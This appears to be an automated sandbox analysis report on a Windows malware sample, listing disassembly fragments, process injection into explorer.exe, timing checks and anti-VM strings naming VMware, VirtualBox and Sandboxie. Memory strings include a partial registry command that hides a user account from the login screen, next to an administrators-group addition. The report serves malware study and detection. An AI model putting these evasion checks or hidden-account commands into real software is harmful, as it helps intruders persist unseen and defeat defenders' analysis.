          Source: Binary string: explorer.pdb source: ByteCodeGenerator.exe, 00000003.00000003.562672294.0000000005259000.00000004.00000800.00020000.00000000.sdmp, ByteCodeGenerator.exe, 00000003.00000002.571105536.0000000005250000.00000040.10000000.00040000.00000000.sdmp, ByteCodeGenerator.exe, 00000003.00000003.564011297.00000000055DC000.00000004.00000800.00020000.00000000.sdmp
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Tedy.130342.18814.exeCode function: 0_2_0187C3B0 pushfd ; iretd 0_2_0187C471
          Source: C:\Windows\SysWOW64\ByteCodeGenerator.exeCode function: 3_2_00417049 push 70121DA5h; iretd 3_2_0041704E
          Source: C:\Windows\SysWOW64\ByteCodeGenerator.exeCode function: 3_2_0040900C push FFFFFFCBh; retf 3_2_0040900E
          Source: C:\Windows\SysWOW64\ByteCodeGenerator.exeCode function: 3_2_0041EC0E push dword ptr [0099C395h]; ret 3_2_0041ED7D
          Source: C:\Windows\SysWOW64\ByteCodeGenerator.exeCode function: 3_2_0041D635 push eax; ret 3_2_0041D688
          Source: C:\Windows\SysWOW64\ByteCodeGenerator.exeCode function: 3_2_0041D6EC push eax; ret 3_2_0041D6F2
          Source: C:\Windows\SysWOW64\ByteCodeGenerator.exeCode function: 3_2_0041D682 push eax; ret 3_2_0041D688
          Source: C:\Windows\SysWOW64\ByteCodeGenerator.exeCode function: 3_2_0041D68B push eax; ret 3_2_0041D6F2
          Source: C:\Windows\SysWOW64\ByteCodeGenerator.exeCode function: 3_2_00416F8B push B33011B3h; retf 3_2_00416F95
          Source: C:\Windows\SysWOW64\ByteCodeGenerator.exeCode function: 3_2_0347D0D1 push ecx; ret 3_2_0347D0E4
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 12_2_055FD0D1 push ecx; ret 12_2_055FD0E4
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 12_2_0334900C push FFFFFFCBh; retf 12_2_0334900E
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 12_2_03357049 push 70121DA5h; iretd 12_2_0335704E
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 12_2_03356F8B push B33011B3h; retf 12_2_03356F95
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 12_2_0335D635 push eax; ret 12_2_0335D688
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 12_2_0335D682 push eax; ret 12_2_0335D688
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 12_2_0335D68B push eax; ret 12_2_0335D6F2
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 12_2_0335D6EC push eax; ret 12_2_0335D6F2
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 12_2_0335EC0E push dword ptr [0099C395h]; ret 12_2_0335ED7D
          Source: initial sampleStatic PE information: section name: .text entropy: 7.09655147134

          Hooking and other Techniques for Hiding and Protection

          barindex
          Source: SecuriteInfo.com.Variant.Tedy.130342.18814.exe, 00000000.00000002.487280531.0000000004BA6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: REG ADD "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList" /v
          Source: SecuriteInfo.com.Variant.Tedy.130342.18814.exe, 00000000.00000002.487280531.0000000004BA6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: localgroup administrators aREG ADD "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList" /v
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Tedy.130342.18814.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Tedy.130342.18814.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Tedy.130342.18814.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Tedy.130342.18814.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Tedy.130342.18814.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Tedy.130342.18814.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Tedy.130342.18814.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Tedy.130342.18814.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Tedy.130342.18814.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Tedy.130342.18814.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Tedy.130342.18814.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Tedy.130342.18814.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Tedy.130342.18814.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Tedy.130342.18814.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Tedy.130342.18814.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Tedy.130342.18814.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Tedy.130342.18814.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Tedy.130342.18814.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Tedy.130342.18814.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Tedy.130342.18814.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Tedy.130342.18814.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Tedy.130342.18814.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\explorer.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior

          Malware Analysis System Evasion

          barindex
          Source: Yara matchFile source: 00000000.00000002.487280531.0000000004BA6000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: Process Memory Space: SecuriteInfo.com.Variant.Tedy.130342.18814.exe PID: 7000, type: MEMORYSTR
          Source: SecuriteInfo.com.Variant.Tedy.130342.18814.exe, 00000000.00000002.487280531.0000000004BA6000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: WINE_GET_UNIX_FILE_NAME
          Source: SecuriteInfo.com.Variant.Tedy.130342.18814.exe, 00000000.00000002.480809439.0000000003231000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Variant.Tedy.130342.18814.exe, 00000000.00000002.487280531.0000000004BA6000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: SBIEDLL.DLL
          Source: C:\Windows\SysWOW64\ByteCodeGenerator.exeRDTSC instruction interceptor: First address: 0000000000408C14 second address: 0000000000408C1A instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Windows\SysWOW64\ByteCodeGenerator.exeRDTSC instruction interceptor: First address: 0000000000408FAE second address: 0000000000408FB4 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Windows\SysWOW64\explorer.exeRDTSC instruction interceptor: First address: 0000000003348C14 second address: 0000000003348C1A instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Windows\SysWOW64\explorer.exeRDTSC instruction interceptor: First address: 0000000003348FAE second address: 0000000003348FB4 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Tedy.130342.18814.exe TID: 7020Thread sleep time: -922337203685477s >= -30000sJump to behavior
          Source: C:\Windows\SysWOW64\explorer.exeLast function: Thread delayed
          Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
          Source: C:\Windows\SysWOW64\ByteCodeGenerator.exeCode function: 3_2_00408EE0 rdtsc 3_2_00408EE0
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Tedy.130342.18814.exeThread delayed: delay time: 922337203685477Jump to behavior
          Source: C:\Windows\SysWOW64\ByteCodeGenerator.exeAPI coverage: 9.0 %
          Source: C:\Windows\SysWOW64\explorer.exeAPI coverage: 9.2 %
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Tedy.130342.18814.exeProcess information queried: ProcessInformationJump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Tedy.130342.18814.exeThread delayed: delay time: 922337203685477Jump to behavior
          Source: SecuriteInfo.com.Variant.Tedy.130342.18814.exe, 00000000.00000002.487280531.0000000004BA6000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: VMware
          Source: SecuriteInfo.com.Variant.Tedy.130342.18814.exe, 00000000.00000002.487280531.0000000004BA6000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: VMWARE"SOFTWARE\VMware, Inc.\VMware ToolsLHARDWARE\DEVICEMAP\Scsi\Scsi Port 1\Scsi Bus 0\Target Id 0\Logical Unit Id 0LHARDWARE\DEVICEMAP\Scsi\Scsi Port 2\Scsi Bus 0\Target Id 0\Logical Unit Id 0'SYSTEM\ControlSet001\Services\Disk\EnumNSYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000
          Source: explorer.exe, 00000004.00000000.519486009.0000000007EF6000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: SCSI\Disk&Ven_VMware&Prod_Virtual_disk\5&1ec51bf7&0&000000
          Source: SecuriteInfo.com.Variant.Tedy.130342.18814.exe, 00000000.00000002.487280531.0000000004BA6000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: WWW /c Microsoft-Hyper-V-Common-Drivers-Package
          Source: explorer.exe, 00000004.00000000.538747034.000000000807B000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}8Ll/
          Source: SecuriteInfo.com.Variant.Tedy.130342.18814.exe, 00000000.00000002.487280531.0000000004BA6000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: C:\WINDOWS\system32\drivers\vmmouse.sys
          Source: explorer.exe, 00000004.00000000.538747034.000000000807B000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}
          Source: SecuriteInfo.com.Variant.Tedy.130342.18814.exe, 00000000.00000002.487280531.0000000004BA6000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: vmware
          Source: explorer.exe, 00000004.00000000.519486009.0000000007EF6000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: VMware SATA CD00
          Source: SecuriteInfo.com.Variant.Tedy.130342.18814.exe, 00000000.00000002.487280531.0000000004BA6000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: C:\PROGRAM FILES\VMWARE\VMWARE TOOLS\
          Source: SecuriteInfo.com.Variant.Tedy.130342.18814.exe, 00000000.00000002.487280531.0000000004BA6000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: C:\WINDOWS\system32\drivers\vmhgfs.sys
          Source: SecuriteInfo.com.Variant.Tedy.130342.18814.exe, 00000000.00000002.487280531.0000000004BA6000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: SOFTWARE\VMware, Inc.\VMware Tools
          Source: explorer.exe, 00000004.00000000.484031457.0000000006915000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
          Source: SecuriteInfo.com.Variant.Tedy.130342.18814.exe, 00000000.00000002.487280531.0000000004BA6000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: VMWARE
          Source: SecuriteInfo.com.Variant.Tedy.130342.18814.exe, 00000000.00000002.487280531.0000000004BA6000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: InstallPath%C:\PROGRAM FILES\VMWARE\VMWARE TOOLS\'C:\WINDOWS\system32\drivers\vmmouse.sys&C:\WINDOWS\system32\drivers\vmhgfs.sys
          Source: explorer.exe, 00000004.00000000.490087729.00000000080B1000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: SCSI\CDROM&VEN_NECVMWAR&PROD_VMWARE_SATA_CD00\5&280B647&0&000000
          Source: SecuriteInfo.com.Variant.Tedy.130342.18814.exe, 00000000.00000002.487280531.0000000004BA6000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: noValueButYesKey)C:\WINDOWS\system32\drivers\VBoxMouse.sys
          Source: SecuriteInfo.com.Variant.Tedy.130342.18814.exe, 00000000.00000002.487280531.0000000004BA6000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: C:\WINDOWS\system32\drivers\VBoxMouse.sys
          Source: explorer.exe, 00000004.00000000.520685059.00000000081F4000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: Prod_VMware_SATAX
          Source: SecuriteInfo.com.Variant.Tedy.130342.18814.exe, 00000000.00000002.487280531.0000000004BA6000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: VMware SVGA II
          Source: explorer.exe, 00000004.00000000.519486009.0000000007EF6000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: SCSI\CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00\5&280b647&0&000000
          Source: C:\Windows\SysWOW64\ByteCodeGenerator.exeCode function: 3_2_00408EE0 rdtsc 3_2_00408EE0
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Tedy.130342.18814.exeProcess token adjusted: DebugJump to behavior
          Source: C:\Windows\SysWOW64\ByteCodeGenerator.exeProcess token adjusted: DebugJump to behavior
          Source: C:\Windows\SysWOW64\explorer.exeProcess token adjusted: DebugJump to behavior
          Source: C:\Windows\SysWOW64\ByteCodeGenerator.exeCode function: 3_2_0342DB40 mov eax, dword ptr fs:[00000030h]3_2_0342DB40
          Source: C:\Windows\SysWOW64\ByteCodeGenerator.exeCode function: 3_2_034F8B58 mov eax, dword ptr fs:[00000030h]3_2_034F8B58
          Source: C:\Windows\SysWOW64\ByteCodeGenerator.exeCode function: 3_2_0342F358 mov eax, dword ptr fs:[00000030h]3_2_0342F358
          Source: C:\Windows\SysWOW64\ByteCodeGenerator.exeCode function: 3_2_0342DB60 mov ecx, dword ptr fs:[00000030h]3_2_0342DB60
          Source: C:\Windows\SysWOW64\ByteCodeGenerator.exeCode function: 3_2_03453B7A mov eax, dword ptr fs:[00000030h]3_2_03453B7A
          Source: C:\Windows\SysWOW64\ByteCodeGenerator.exeCode function: 3_2_03453B7A mov eax, dword ptr fs:[00000030h]3_2_03453B7A
          Source: C:\Windows\SysWOW64\ByteCodeGenerator.exeCode function: 3_2_034E131B mov eax, dword ptr fs:[00000030h]3_2_034E131B
          Source: C:\Windows\SysWOW64\ByteCodeGenerator.exeCode function: 3_2_034A53CA mov eax, dword ptr fs:[00000030h]3_2_034A53CA
          Source: C:\Windows\SysWOW64\ByteCodeGenerator.exeCode function: 3_2_034A53CA mov eax, dword ptr fs:[00000030h]3_2_034A53CA
          Source: C:\Windows\SysWOW64\ByteCodeGenerator.exeCode function: 3_2_034503E2 mov eax, dword ptr fs:[00000030h]3_2_034503E2
          Source: C:\Windows\SysWOW64\ByteCodeGenerator.exeCode function: 3_2_034503E2 mov eax, dword ptr fs:[00000030h]3_2_034503E2
          Source: C:\Windows\SysWOW64\ByteCodeGenerator.exeCode function: 3_2_034503E2 mov eax, dword ptr fs:[00000030h]3_2_034503E2
          Source: C:\Windows\SysWOW64\ByteCodeGenerator.exeCode function: 3_2_034503E2 mov eax, dword ptr fs:[00000030h]3_2_034503E2
          Source: C:\Windows\SysWOW64\ByteCodeGenerator.exeCode function: 3_2_034503E2 mov eax, dword ptr fs:[00000030h]3_2_034503E2
          Source: C:\Windows\SysWOW64\ByteCodeGenerator.exeCode function: 3_2_034503E2 mov eax, dword ptr fs:[00000030h]3_2_034503E2
          Source: C:\Windows\SysWOW64\ByteCodeGenerator.exeCode function: 3_2_0344DBE9 mov eax, dword ptr fs:[00000030h]3_2_0344DBE9
          Source: C:\Windows\SysWOW64\ByteCodeGenerator.exeCode function: 3_2_034E138A mov eax, dword ptr fs:[00000030h]3_2_034E138A
          Source: C:\Windows\SysWOW64\ByteCodeGenerator.exeCode function: 3_2_03431B8F mov eax, dword ptr fs:[00000030h]3_2_03431B8F
          Source: C:\Windows\SysWOW64\ByteCodeGenerator.exeCode function: 3_2_03431B8F mov eax, dword ptr fs:[00000030h]3_2_03431B8F
          Source: C:\Windows\SysWOW64\ByteCodeGenerator.exeCode function: 3_2_034DD380 mov ecx, dword ptr fs:[00000030h]3_2_034DD380
          Source: C:\Windows\SysWOW64\ByteCodeGenerator.exeCode function: 3_2_03452397 mov eax, dword ptr fs:[00000030h]3_2_03452397
          Source: C:\Windows\SysWOW64\ByteCodeGenerator.exeCode function: 3_2_0345B390 mov eax, dword ptr fs:[00000030h]3_2_0345B390
          Source: C:\Windows\SysWOW64\ByteCodeGenerator.exeCode function: 3_2_03454BAD mov eax, dword ptr fs:[00000030h]3_2_03454BAD
          Source: C:\Windows\SysWOW64\ByteCodeGenerator.exeCode function: 3_2_03454BAD mov eax, dword ptr fs:[00000030h]3_2_03454BAD
          Source: C:\Windows\SysWOW64\ByteCodeGenerator.exeCode function: 3_2_03454BAD mov eax, dword ptr fs:[00000030h]3_2_03454BAD
          Source: C:\Windows\SysWOW64\ByteCodeGenerator.exeCode function: 3_2_034F5BA5 mov eax, dword ptr fs:[00000030h]3_2_034F5BA5
          Source: C:\Windows\SysWOW64\ByteCodeGenerator.exeCode function: 3_2_03429240 mov eax, dword ptr fs:[00000030h]3_2_03429240
          Source: C:\Windows\SysWOW64\ByteCodeGenerator.exeCode function: 3_2_03429240 mov eax, dword ptr fs:[00000030h]3_2_03429240
          Source: C:\Windows\SysWOW64\ByteCodeGenerator.exeCode function: 3_2_03429240 mov eax, dword ptr fs:[00000030h]3_2_03429240
          Source: C:\Windows\SysWOW64\ByteCodeGenerator.exeCode function: 3_2_03429240 mov eax, dword ptr fs:[00000030h]3_2_03429240
          Source: C:\Windows\SysWOW64\ByteCodeGenerator.exeCode function: 3_2_034EEA55 mov eax, dword ptr fs:[00000030h]3_2_034EEA55
          Source: C:\Windows\SysWOW64\ByteCodeGenerator.exeCode function: 3_2_034B4257 mov eax, dword ptr fs:[00000030h]3_2_034B4257
          Source: C:\Windows\SysWOW64\ByteCodeGenerator.exeCode function: 3_2_034DB260 mov eax, dword ptr fs:[00000030h]3_2_034DB260
          Source: C:\Windows\SysWOW64\ByteCodeGenerator.exeCode function: 3_2_034DB260 mov eax, dword ptr fs:[00000030h]3_2_034DB260
          Source: C:\Windows\SysWOW64\ByteCodeGenerator.exeCode function: 3_2_034F8A62 mov eax, dword ptr fs:[00000030h]3_2_034F8A62
          Source: C:\Windows\SysWOW64\ByteCodeGenerator.exeCode function: 3_2_0346927A mov eax, dword ptr fs:[00000030h]3_2_0346927A
          Source: C:\Windows\SysWOW64\ByteCodeGenerator.exeCode function: 3_2_03438A0A mov eax, dword ptr fs:[00000030h]3_2_03438A0A
          Source: C:\Windows\SysWOW64\ByteCodeGenerator.exeCode function: 3_2_03425210 mov eax, dword ptr fs:[00000030h]3_2_03425210
          Source: C:\Windows\SysWOW64\ByteCodeGenerator.exeCode function: 3_2_03425210 mov ecx, dword ptr fs:[00000030h]3_2_03425210
          Source: C:\Windows\SysWOW64\ByteCodeGenerator.exeCode function: 3_2_03425210 mov eax, dword ptr fs:[00000030h]3_2_03425210
          Source: C:\Windows\SysWOW64\ByteCodeGenerator.exeCode function: 3_2_03425210 mov eax, dword ptr fs:[00000030h]3_2_03425210
          Source: C:\Windows\SysWOW64\ByteCodeGenerator.exeCode function: 3_2_0342AA16 mov eax, dword ptr fs:[00000030h]3_2_0342AA16
          Source: C:\Windows\SysWOW64\ByteCodeGenerator.exeCode function: 3_2_0342AA16 mov eax, dword ptr fs:[00000030h]3_2_0342AA16
          Source: C:\Windows\SysWOW64\ByteCodeGenerator.exeCode function: 3_2_03443A1C mov eax, dword ptr fs:[00000030h]3_2_03443A1C
          Source: C:\Windows\SysWOW64\ByteCodeGenerator.exeCode function: 3_2_034EAA16 mov eax, dword ptr fs:[00000030h]3_2_034EAA16
          Source: C:\Windows\SysWOW64\ByteCodeGenerator.exeCode function: 3_2_034EAA16 mov eax, dword ptr fs:[00000030h]3_2_034EAA16
          Source: C:\Windows\SysWOW64\ByteCodeGenerator.exeCode function: 3_2_03464A2C mov eax, dword ptr fs:[00000030h]3_2_03464A2C
          Source: C:\Windows\SysWOW64\ByteCodeGenerator.exeCode function: 3_2_03464A2C mov eax, dword ptr fs:[00000030h]3_2_03464A2C
          Source: C:\Windows\SysWOW64\ByteCodeGenerator.exeCode function: 3_2_03452ACB mov eax, dword ptr fs:[00000030h]3_2_03452ACB
          Source: C:\Windows\SysWOW64\ByteCodeGenerator.exeCode function: 3_2_03452AE4 mov eax, dword ptr fs:[00000030h]3_2_03452AE4
          Source: C:\Windows\SysWOW64\ByteCodeGenerator.exeCode function: 3_2_0345D294 mov eax, dword ptr fs:[00000030h]3_2_0345D294
          Source: C:\Windows\SysWOW64\ByteCodeGenerator.exeCode function: 3_2_0345D294 mov eax, dword ptr fs:[00000030h]3_2_0345D294
          Source: C:\Windows\SysWOW64\ByteCodeGenerator.exeCode function: 3_2_034252A5 mov eax, dword ptr fs:[00000030h]3_2_034252A5
          Source: C:\Windows\SysWOW64\ByteCodeGenerator.exeCode function: 3_2_034252A5 mov eax, dword ptr fs:[00000030h]3_2_034252A5
          Source: C:\Windows\SysWOW64\ByteCodeGenerator.exeCode function: 3_2_034252A5 mov eax, dword ptr fs:[00000030h]3_2_034252A5
          Source: C:\Windows\SysWOW64\ByteCodeGenerator.exeCode function: 3_2_034252A5 mov eax, dword ptr fs:[00000030h]3_2_034252A5
          Source: C:\Windows\SysWOW64\ByteCodeGenerator.exeCode function: 3_2_034252A5 mov eax, dword ptr fs:[00000030h]3_2_034252A5
          Source: C:\Windows\SysWOW64\ByteCodeGenerator.exeCode function: 3_2_0343AAB0 mov eax, dword ptr fs:[00000030h]3_2_0343AAB0
          Source: C:\Windows\SysWOW64\ByteCodeGenerator.exeCode function: 3_2_0343AAB0 mov eax, dword ptr fs:[00000030h]3_2_0343AAB0
          Source: C:\Windows\SysWOW64\ByteCodeGenerator.exeCode function: 3_2_0345FAB0 mov eax, dword ptr fs:[00000030h]3_2_0345FAB0
          Source: C:\Windows\SysWOW64\ByteCodeGenerator.exeCode function: 3_2_0344B944 mov eax, dword ptr fs:[00000030h]3_2_0344B944
          Source: C:\Windows\SysWOW64\ByteCodeGenerator.exeCode function: 3_2_0344B944 mov eax, dword ptr fs:[00000030h]3_2_0344B944
          Source: C:\Windows\SysWOW64\ByteCodeGenerator.exeCode function: 3_2_0342C962 mov eax, dword ptr fs:[00000030h]3_2_0342C962
          Source: C:\Windows\SysWOW64\ByteCodeGenerator.exeCode function: 3_2_0342B171 mov eax, dword ptr fs:[00000030h]3_2_0342B171
          Source: C:\Windows\SysWOW64\ByteCodeGenerator.exeCode function: 3_2_0342B171 mov eax, dword ptr fs:[00000030h]3_2_0342B171
          Source: C:\Windows\SysWOW64\ByteCodeGenerator.exeCode function: 3_2_03429100 mov eax, dword ptr fs:[00000030h]3_2_03429100
          Source: C:\Windows\SysWOW64\ByteCodeGenerator.exeCode function: 3_2_03429100 mov eax, dword ptr fs:[00000030h]3_2_03429100
          Source: C:\Windows\SysWOW64\ByteCodeGenerator.exeCode function: 3_2_03429100 mov eax, dword ptr fs:[00000030h]3_2_03429100
          Source: C:\Windows\SysWOW64\ByteCodeGenerator.exeCode function: 3_2_03444120 mov eax, dword ptr fs:[00000030h]3_2_03444120
          Source: C:\Windows\SysWOW64\ByteCodeGenerator.exeCode function: 3_2_03444120 mov eax, dword ptr fs:[00000030h]3_2_03444120
          Source: C:\Windows\SysWOW64\ByteCodeGenerator.exeCode function: 3_2_03444120 mov eax, dword ptr fs:[00000030h]3_2_03444120
          Source: C:\Windows\SysWOW64\ByteCodeGenerator.exeCode function: 3_2_03444120 mov eax, dword ptr fs:[00000030h]3_2_03444120
          Source: C:\Windows\SysWOW64\ByteCodeGenerator.exeCode function: 3_2_03444120 mov ecx, dword ptr fs:[00000030h]3_2_03444120
          Source: C:\Windows\SysWOW64\ByteCodeGenerator.exeCode function: 3_2_0345513A mov eax, dword ptr fs:[00000030h]3_2_0345513A
          Source: C:\Windows\SysWOW64\ByteCodeGenerator.exeCode function: 3_2_0345513A mov eax, dword ptr fs:[00000030h]3_2_0345513A
          Source: C:\Windows\SysWOW64\ByteCodeGenerator.exeCode function: 3_2_0342B1E1 mov eax, dword ptr fs:[00000030h]3_2_0342B1E1
          Source: C:\Windows\SysWOW64\ByteCodeGenerator.exeCode function: 3_2_0342B1E1 mov eax, dword ptr fs:[00000030h]3_2_0342B1E1
          Source: C:\Windows\SysWOW64\ByteCodeGenerator.exeCode function: 3_2_0342B1E1 mov eax, dword ptr fs:[00000030h]3_2_0342B1E1
          Source: C:\Windows\SysWOW64\ByteCodeGenerator.exeCode function: 3_2_034B41E8 mov eax, dword ptr fs:[00000030h]3_2_034B41E8
          Source: C:\Windows\SysWOW64\ByteCodeGenerator.exeCode function: 3_2_0345A185 mov eax, dword ptr fs:[00000030h]3_2_0345A185
          Source: C:\Windows\SysWOW64\ByteCodeGenerator.exeCode function: 3_2_0344C182 mov eax, dword ptr fs:[00000030h]3_2_0344C182
          Source: C:\Windows\SysWOW64\ByteCodeGenerator.exeCode function: 3_2_03452990 mov eax, dword ptr fs:[00000030h]3_2_03452990
          Source: C:\Windows\SysWOW64\ByteCodeGenerator.exeCode function: 3_2_034561A0 mov eax, dword ptr fs:[00000030h]3_2_034561A0
          Source: C:\Windows\SysWOW64\ByteCodeGenerator.exeCode function: 3_2_034561A0 mov eax, dword ptr fs:[00000030h]3_2_034561A0
          Source: C:\Windows\SysWOW64\ByteCodeGenerator.exeCode function: 3_2_034A69A6 mov eax, dword ptr fs:[00000030h]3_2_034A69A6
          Source: C:\Windows\SysWOW64\ByteCodeGenerator.exeCode function: 3_2_034A51BE mov eax, dword ptr fs:[00000030h]3_2_034A51BE
          Source: C:\Windows\SysWOW64\ByteCodeGenerator.exeCode function: 3_2_034A51BE mov eax, dword ptr fs:[00000030h]3_2_034A51BE
          Source: C:\Windows\SysWOW64\ByteCodeGenerator.exeCode function: 3_2_034A51BE mov eax, dword ptr fs:[00000030h]3_2_034A51BE
          Source: C:\Windows\SysWOW64\ByteCodeGenerator.exeCode function: 3_2_034A51BE mov eax, dword ptr fs:[00000030h]3_2_034A51BE
          Source: C:\Windows\SysWOW64\ByteCodeGenerator.exeCode function: 3_2_03440050 mov eax, dword ptr fs:[00000030h]3_2_03440050
          Source: C:\Windows\SysWOW64\ByteCodeGenerator.exeCode function: 3_2_03440050 mov eax, dword ptr fs:[00000030h]3_2_03440050
          Source: C:\Windows\SysWOW64\ByteCodeGenerator.exeCode function: 3_2_034F1074 mov eax, dword ptr fs:[00000030h]3_2_034F1074
          Source: C:\Windows\SysWOW64\ByteCodeGenerator.exeCode function: 3_2_034E2073 mov eax, dword ptr fs:[00000030h]3_2_034E2073
          Source: C:\Windows\SysWOW64\ByteCodeGenerator.exeCode function: 3_2_034F4015 mov eax, dword ptr fs:[00000030h]3_2_034F4015
          Source: C:\Windows\SysWOW64\ByteCodeGenerator.exeCode function: 3_2_034F4015 mov eax, dword ptr fs:[00000030h]3_2_034F4015
          Source: C:\Windows\SysWOW64\ByteCodeGenerator.exeCode function: 3_2_034A7016 mov eax, dword ptr fs:[00000030h]3_2_034A7016
          Source: C:\Windows\SysWOW64\ByteCodeGenerator.exeCode function: 3_2_034A7016 mov eax, dword ptr fs:[00000030h]3_2_034A7016
          Source: C:\Windows\SysWOW64\ByteCodeGenerator.exeCode function: 3_2_034A7016 mov eax, dword ptr fs:[00000030h]3_2_034A7016
          Source: C:\Windows\SysWOW64\ByteCodeGenerator.exeCode function: 3_2_0345002D mov eax, dword ptr fs:[00000030h]3_2_0345002D
          Source: C:\Windows\SysWOW64\ByteCodeGenerator.exeCode function: 3_2_0345002D mov eax, dword ptr fs:[00000030h]3_2_0345002D
